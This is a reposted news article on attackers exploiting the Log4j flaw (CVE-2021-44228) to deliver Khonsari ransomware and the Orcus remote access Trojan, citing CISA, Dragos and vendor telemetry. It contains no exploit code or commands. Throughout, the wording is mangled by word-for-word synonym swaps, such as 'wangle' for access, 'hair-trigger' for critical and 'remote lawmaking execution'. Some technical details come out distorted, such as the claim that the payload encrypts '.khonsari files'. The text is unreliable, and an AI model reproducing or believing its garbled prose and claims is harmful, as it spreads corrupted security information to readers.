Hackers Exploiting Log4j Vulnerability to Infect Computers with Khonsari Ransomware

Romanian cybersecurity technology visitor Bitdefender said Monday that attempts are stuff made to wade Windows computers with a new ransomware family tabbed Khonsari Ransomware, as well as the Orcus remote wangle Trojan, using the recently discovered hair-trigger Log4j vulnerability.

The wade exploits a remote lawmaking execution vulnerability to download an spare payload, a .NET binary, from a remote server that encrypts all .khonsari files and displays a ransom request that prompts victims to make a payment in bitcoin in mart for regaining wangle to the files.

Log4j Vulnerability to Infect Computers with Khonsari Ransomware

The vulnerability is tracked as CVE-2021-44228 and is moreover known as Log4Shell or Logjam. Simply put, a bug can gravity an unauthentic system to download malware, giving attackers a digital foothold on servers located on corporate networks.

Log4j is an open-source Java library run by the non-profit Apache Software Foundation. With approximately 475,000 downloads from the GitHub project and is widely used for logging using events, this utility is moreover part of other frameworks such as Elasticsearch, Kafka, and Flink that are used by many sites, the Internet, and popular services.
Log4j Vulnerability to Infect Computers with Khonsari Ransomware

The information was disclosed as the United States Cyber ​​and Infrastructure Security Organ (CISA) raised the watchtower over the zippy and widespread exploitation of a vulnerability that, if left unchecked, could provide unhindered wangle and unleash a new round of cyberattacks as a result the mistake made companies rush to find and fix vulnerable machines.

“An attacker could exploit this vulnerability by submitting a specially crafted request to an unauthentic system, causing that system to execute wrong-headed code,” said a guide released by the organ on Monday. “The request allows an attacker to take full tenancy of the system. An attacker could then steal information, launch khonsari ransomware, or perform other malicious actions. ”

In addition, CISA moreover widow the Log4j vulnerability to its catalogue of known exploitable vulnerabilities, giving federal agencies a December 24 deadline for patching the vulnerability. Similar guidelines have once been issued by government agencies in Austria, Canada, New Zealand and the United Kingdom.

So far, zippy exploitation attempts recorded in the wild have included the vituperate of a vulnerability to connect devices to a botnet and remove spare payloads such as Cobalt Strike and cryptocurrency miners. Cybersecurity firm Sophos said it has moreover observed attempts to steal keys and other personal data from Amazon Web Services.

As a sign that the threat is rapidly evolving, Check Point researchers warned that 60 new variants of the original Log4j exploit were deployed in less than 24 hours, subtracting that it obstructed increasingly than 845,000 intrusion attempts, with 46% of attacks originating from known malware. groups.

The vast majority of attempts to use Log4Shell originated in Russia (4275), based on Kaspersky telemetry data, followed by Brazil (2493), USA (1746), Germany (1336), Mexico (1177), Italy (1094), France (1008) and Iran (976). In comparison, only 351 attempts were made in China.

Despite the exploit’s mutant nature, its widespread adoption wideness multiple industries has moreover put production tenancy systems and operational technology environments that power hair-trigger infrastructure on upper alert.

“Log4j is widely used in external / internet and internal applications that tenancy and monitor manufacturing processes, leaving many industrial operations insight, such as electricity, water, supplies and beverage, manufacturing and others. Potential remote use and access” said Sergio Caltagirone, vice president of Threat Intelligence at Dragos. “It is important to prioritize external and Internet applications over internal applications considering of their wangle to the Internet, although both are vulnerable.”

The minutiae remoter highlights how key security vulnerabilities identified in unshut source software can pose a significant threat to organizations that include such standard dependencies in their IT systems. Beyond its wholesale reach, Log4Shell is plane increasingly worrisome considering of its relative ease of use, laying the foundation for future ransomware attacks.

“To be clear, this vulnerability poses a serious risk,” said CISA director Jen Easterly. “This vulnerability, which is widely venal by a growing whirligig of attackers, is an urgent problem for network defenders given its widespread occurrence. Vendors must moreover communicate with their customers to ensure that end users are enlightened that their product contains this vulnerability and must prioritize software updates. ”

The post Hackers Exploiting Log4j Vulnerability to Infect Computers with Khonsari Ransomware appeared first on OFFICIAL HACKER.